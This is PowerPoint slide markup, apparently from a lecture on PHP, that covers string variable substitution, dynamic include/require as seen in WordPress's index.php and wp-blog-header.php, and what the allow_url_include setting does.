        <p:spPr>
          <a:xfrm>
            <a:off x="1854200" y="4247445"/>
            <a:ext cx="5949243" cy="465668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="0"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100" cmpd="sng">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457200" y="6003053"/>
            <a:ext cx="8229600" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>en.wikipedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/wiki/PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27918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Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamically typed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>String variable substitution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>require</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Superglobals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variable variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>register_globals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2076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PHP – String Variable Substitution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo 'this is a simple string';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo 'Variables do not $expand $either';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$juice = "apple";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo "He drank some $juice juice.";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$juices = array("apple", "orange", "koolaid1" =&gt; "purple");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo "He drank some $juices[0] juice.";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo "He drank some $juices[1] juice.";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo "He drank some $juices[koolaid1] juice.";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>echo "This works: {$juices['koolaid1']}";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6003053"/>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language.types.string.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5746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PHP – Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include/require</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a: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Front to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> application. This file doesn't do anything, but loads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-blog-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>header.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> which does and tells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> to load the theme.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> * @package </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Tells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> to load the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> theme and output it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> * @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>define('WP_USE_THEMES', true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/** Loads the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> Environment and Template */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>require( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dirname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>( __FILE__ ) . '/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-blog-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>header.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>' );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1217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wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-blog-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>header.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> * Loads the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> environment and template.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> * @package </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>WordPress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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if ( !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>wp_did_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) ) {</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wp_did_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = true;</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require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dirname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(__FILE__) . '/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>wp-load.php</a:t>
            </a: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wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>();</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require_once</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>( ABSPATH . WPINC . '/template-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>loader.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>' );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13320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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>allow_url_include</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP setting to allow http and ftp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to include functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This setting allows calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Remote file is fetched, parsed, and executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100803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t>Superglobals</a:t>
